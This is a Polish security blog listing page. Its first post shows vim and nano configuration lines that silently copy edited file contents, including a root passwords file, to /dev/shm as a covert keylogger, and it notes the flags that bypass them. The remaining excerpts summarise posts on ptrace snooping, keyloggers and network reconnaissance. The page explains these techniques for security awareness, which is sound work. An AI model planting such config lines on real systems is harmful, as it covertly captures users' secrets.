Napisał: Patryk Krawaczyński
06/03/2023 w Pen Test
Jeśli dodamy poniższą linijkę do pliku ~/.vimrc
lub ~/.vim/plugins/keylogger.vim
:
:autocmd BufWritePost * :silent :w! >> /dev/shm/keylogger.txt
To wszystkie wpisane dane wpisane w edytorze wylądują w pliku /dev/shm/keylogger.txt. Dla osób stojących po drugiej stronie wojny edytorów – jeśli do pliku ~/.nanorc
lub /etc/nanorc
wpisy:
set backup
set backupdir /dev/shm
set allow_insecure_backup
To kopie zapasowe edytowanych plików wylądują w katalogu /dev/shm/:
root@stardust:~# ls -al /dev/shm/
total 8
drwxrwxrwt 2 root root 80 Mar 6 20:17 .
drwxr-xr-x 18 root root 4120 Feb 11 17:58 ..
-rw-r----- 1 root root 31 Mar 6 20:09 keylogger.txt
-rw-r----- 1 root root 22 Mar 6 20:09 '!root!passwords.txt~'
Jeśli pliki konfiguracyjne mają zostać pominięte przy uruchomieniu wystarczy uruchomić je z opcjami:
nano -R [plik]
vim -u NONE [plik]
Więcej informacji: Alh4zr3d on Twitter
Napisał: Patryk Krawaczyński
12/11/2016 w Bezpieczeństwo
T
o, że używamy SSH do połączeń z serwerami nie oznacza, że możemy czuć się bezpiecznie. Szczególnie musimy uważać na te maszyny, którymi zarządzają niezaufane osoby. Dlaczego? Ponieważ odczyt niezaszyfrowanych danych w systemie można wykonać na różnych poziomach dostępu. Za przykład weźmy wywołanie ptrace, które jest używane do monitoringu i kontroli innych procesów. Głównie jest używane do debugowania, a chyba najpopularniejszym programem wykorzystującym jego możliwości jest strace.
[ czytaj całość… ]
Napisał: Patryk Krawaczyński
22/05/2016 w Bezpieczeństwo
A
run Prakash Jana napisał moduł do jądra Linuksa, który przechwytuje naciśnięcia klawiszy na klawiaturze. Współpracuje z klawiaturami o układzie US (i zgodnych z nimi komputerami przenośnymi). Przyciśnięte klawisze są zapisywane w przestrzeni systemu plików pomagającym w debugowaniu innych systemów plików – debugfs tak długo dopóki moduł pozostaje załadowany w systemie.
[ czytaj całość… ]
Napisał: Patryk Krawaczyński
26/03/2010 w Magazyny
I
mię domowego zwierzaka i bieżący rok to najczęściej wykorzystywany schemat haseł. Jednak, gdy hasło jest tak silne, że nie można go wykryć typowymi metodami, istnieje groźba, że zostanie ono podsłuchane. Nie chodzi o przysłuchiwanie się osobom mamroczącym podczas pisania, lecz o podsłuchiwanie klawiatury przez programy uruchomione w Windows.
[ czytaj całość… ]
Napisał: Patryk Krawaczyński
18/03/2010 w Ataki Internetowe
N
etwork snooping – (ang. szpiegowanie sieci) – ten rodzaj ataku jest przez wielu uważany za najbardziej wyrafinowaną metodę wywiadu do przeprowadzenia dalszego procesu ataków. Do jej przeprowadzenia wykorzystuje się różnego rodzaju analizatory sieci i inne narzędzia, dzięki którym potencjalny włamywacz wybiera taką metodę ataku, która w danym przypadku będzie najbardziej efektywna.
[ czytaj całość… ]
Ostatni komentarz :